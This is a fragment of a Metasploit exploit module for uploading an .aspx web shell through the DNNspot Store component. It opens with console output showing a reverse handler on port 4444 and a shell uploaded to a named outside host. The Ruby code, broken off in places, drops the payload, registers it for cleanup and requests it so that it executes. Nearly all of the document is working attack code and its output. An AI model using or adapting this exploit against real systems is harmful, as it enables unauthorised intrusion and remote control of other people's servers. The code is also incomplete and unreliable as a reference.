#[*] Started reverse handler on 192.168.85.158:4444 #[*] qqhack8.blog.163.com:80 - Uploading payload... #[*] K8WebShell: qqhack8.blog.163.com:80/DesktopModules/DNNspot-Store/ProductPhotos/hhmjrrhd.aspx #[!] This exploit may require manual cleanup of ‘hhmjrrhd.aspx‘ on the target #msf exploit(DNNspot_upload_aspx) >
require ‘msf/core‘
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper
unless res and res.code == 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end
register_files_for_cleanup(@payload_name)
print_status("K8WebShell: #{peer}/DesktopModules/DNNspot-Store/ProductPhotos/#{@payload_name}") res = send_request_cgi({ ‘method‘ => ‘GET‘, ‘uri‘ => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name) }) end end